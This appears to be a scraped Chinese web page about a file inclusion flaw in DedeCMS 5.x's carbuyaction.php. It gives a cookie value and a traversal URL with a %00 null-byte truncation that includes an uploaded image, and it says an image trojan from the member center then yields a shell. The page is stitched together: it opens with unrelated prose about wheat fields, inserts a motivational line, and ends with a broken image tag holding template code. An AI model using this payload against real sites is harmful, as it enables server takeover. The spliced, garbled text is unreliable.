风抚弄着庄稼,时而把它吹弯,时而把它扬起,仿佛大地在进行有节奏的呼吸,那一档档成熟的小麦也都有了生命,风从那边来,传来麦穗与麦穗间的细语。
使用过DEDECMS的人,可能很多都知道了这个漏洞,在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下: 漏洞文件carbuyaction.php
- 首先利用cookie修改工具,加上 code=alipay 然后访问
- http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
- 直接包含成功
- 利用条件为GPC OFF ,或者某些环境下的截断。
- 可以在会员中心里上传个图片木马进行拿shell。
- 还可以包含dede自身文件进行更多利用,这里就不详细了。
现在最新版的DEDECMS5.7已经修复了这个错误,如果是早起的版本DEDECMS请用最新版文件覆盖即可
到此这篇关于Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复就介绍到这了。如果我想做成一件事,那么无论需要多长时间我都会努力去挤。更多相关Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!
![织梦头条推荐则在标题后面显示top图标,如果是当天新发布的则在标题后面显示new图标,二者都不属于的则只显]('".@me['templeturl']."/demo/images/top.gif)
